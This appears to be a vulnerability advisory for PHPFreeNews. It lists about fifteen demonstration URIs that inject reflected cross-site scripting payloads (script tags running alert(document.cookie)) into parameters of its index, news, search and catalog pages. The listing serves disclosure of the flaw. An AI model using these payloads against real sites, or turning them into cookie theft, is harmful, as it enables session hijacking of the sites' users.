|
|
PHPFreeNews Multiple Cross Site Scripting Vulnerabilities
No exploit is required. Demonstration exploit URI have been provided: http://[target]/[path]/index.php?front_indextitle=</title><script>alert(document.cookie)</script> http://[target]/[path]/index.php?front_searchsubmit="><script>alert(document.cookie)</script> http://[target]/[path]/index.php?front_latestnews="><script>alert(document.cookie)</script> http://[target]/[path]/news.php?newsid="><script>alert(document.cookie)</script> http://[target]/[path]/news.php?front_rating="><script>alert(document.cookie)</script> http://[target]/[path]/news.php?salt="><script>alert(document.cookie)</script> http://[target]/[path]/news.php?front_letmerateit="><script>alert(document.cookie)</script> http://[target]/[path]/news.php?front_ratebest="><script>alert(document.cookie)</script> http://[target]/[path]/news.php?front_ratesubmit="><script>alert(document.cookie)</script> http://[target]/[path]/news.php?front_searchsubmit="><script>alert(document.cookie)</script> http://[target]/[path]/search.php?front_searchresult=</title><script>alert(document.cookie)</script> http://[target]/[path]/search.php?front_searchsubmit="><script>alert(document.cookie)</script> http://[target]/[path]/catalog.php?front_searchsubmit="><script>alert(document.cookie)</script> http://[target]/[path]/catalog.php?front_latestnews="><script>alert(document.cookie)</script> http://[target]/[path]/catalog.php?catalogid="><script>alert(document.cookie)</script> |
|
Privacy Statement |